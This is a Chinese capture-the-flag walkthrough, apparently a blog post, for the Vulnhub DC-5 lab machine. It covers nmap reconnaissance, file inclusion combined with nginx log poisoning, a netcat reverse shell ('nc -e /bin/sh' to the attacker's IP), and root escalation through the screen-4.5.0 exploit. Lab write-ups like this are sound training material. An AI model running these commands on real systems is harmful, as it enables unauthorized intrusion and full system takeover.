Vulnhub靶机 DC-5

在这里插入图片描述
先找到靶机
然后扫一下

nmap -sP 192.168.0.0/24
nmap -sV 192.168.0.149

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现底下的年份一直再变,怀疑文件包含漏洞

在这里插入图片描述

在这里插入图片描述
写个phpinfo试一下
返回phpinfo页面
成功

<?php phpinfo();?>

在这里插入图片描述
在这里插入图片描述

监听端口
nc建立连接

nc -nlvp 4444
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/sh 192.168.0.128 4444
http://192.168.0.149/thankyou.php?file=/var/log/nginx/access.log


在这里插入图片描述
查看root权限
发现screen-4.5.0

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

在这里插入图片描述
找一下漏洞

searchsploit screen 4.5

在这里插入图片描述

在这里插入图片描述

打开41154.txt,根据提示做出3个文件

在这里插入图片描述

打开apache,准备wget传输文件

/etc/init.d/apache2 start

在这里插入图片描述
在这里插入图片描述
下载文件之前建立反射shell

python -c 'import pty;pty.spawn("/bin/bash")'
wget 文件名

在这里插入图片描述
利用文件
忘了截图了,偷一张~

./rootshell

拿到flag!!!

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值